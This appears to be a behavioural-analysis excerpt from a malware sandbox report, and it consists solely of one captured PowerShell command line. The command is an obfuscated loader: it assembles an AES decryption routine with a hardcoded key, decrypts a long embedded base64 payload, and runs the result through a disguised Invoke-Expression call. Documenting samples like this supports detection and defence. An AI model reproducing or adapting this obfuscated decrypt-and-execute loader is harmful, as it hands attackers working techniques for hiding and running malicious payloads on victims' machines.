Behavioral Analysis

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI33875419224826702940537577739181CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIri80kRp8Wd309o8uMjCHZGUii0bRMcsrbHHHL+X45oYyzuF4S3e6GVM0e+pl2BU27T+o3U47DIQXyCEbbsY3gN+NKfJGuxcZnCvfWXviSDQkn56OjGYRen9drdjFnWfy8HofbxfsNtUbi+sY/E64/LcGt/c/aVckAqSjibPU7JN7xVQyyVoSZIc1s1y/BzcU37eACUI0rJiga/2nnEROZP45lmQLp/5tepXk/4Nsc9eQ79NMp1rgqhHFpj5hPCuW5mTO5cwo2MuIOYeAfs9wRhfN/2m9G1xcBDzLZ/GrarNq3C+T8gaVFNj5N1wFpi77cdr3iOxIJw3jColqQwqtIBNgAhVDnbvzyqp/Nelf29Ss61/TMdjO2vBdodzQroMOv3JbrfuEgpgYDTLKnHpuTjy+bkvtxIr3YoWNYoHm/m0cps4EBx0HjBlchM5Y0EyVTQXB7H/iInAQVNMc9K4ZUzpcK4A9oBNmzkrv+BJ//16W/ph5Ud31mXNkD5wcg+rablZf4oO6x65fTqBb6GwjjLp/CCSoi+ghzv+n7XvEMN072z13Kr0aKLuUpRkpFbOMxOl1gz+W9L5nzZYEonr8Ef7QCXBWH1efAfmw/rOjJk4GS3n67D+Xt+Xi4nagkgXuz3q4x3sb/BC9fBOa65aM7K6ArL518tiDqrdMwuw+PRpCUsbiNRKQTdSaM7XrTGuX0TaIde76/r+vdHl9dhrkNKbWxL6aUXY//+ltZ8KD1tKSHOjrPl0V66LW2x1rJbmeaoEDQ/mziRwi9uyvQShtGrUPlTcF8BTVNYQlVxj4tCMvYndNjMKaq5pKQK4ZBAH4XN1D1Uyc8h98jAggebme+4gNq15kkfu5ngfMrq8xUJsm+F+NgwtDFthidIWpmay2/isYSX+VXxTA9UORNSZ1xHJcv/4N2ew+y2xhayj7WNIs9CwGBIpv5WyKwc2WwMSm15E/Q0FIVV079eGLQZ5zT9c36kriUQtLMKwm/XqsZZOJ8yoXtr1WIG4DYjevVCE04Y91oXiMgIvmBrLNYjFVF63b20jnRoNOAsa0cleimMV4rca9PaoxA015MRIfXuxoEW0mlOBGfp2SJR5T555CZsyecbKejwhlHrKm1Ke4h9qflRn+Rc9pEinfGjCvI+F5Md2QKTQmi5ZlDk3WAnL2X+9+hYNMp4dc1j6gEeVBCHmnSE92wxQL2LmgDVkq7pfY3ggKxwUr7LajvylgkdB5u2oA0hEMcRmcszoSNx01RdJBPea816PQMD6A9w36sLm5CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')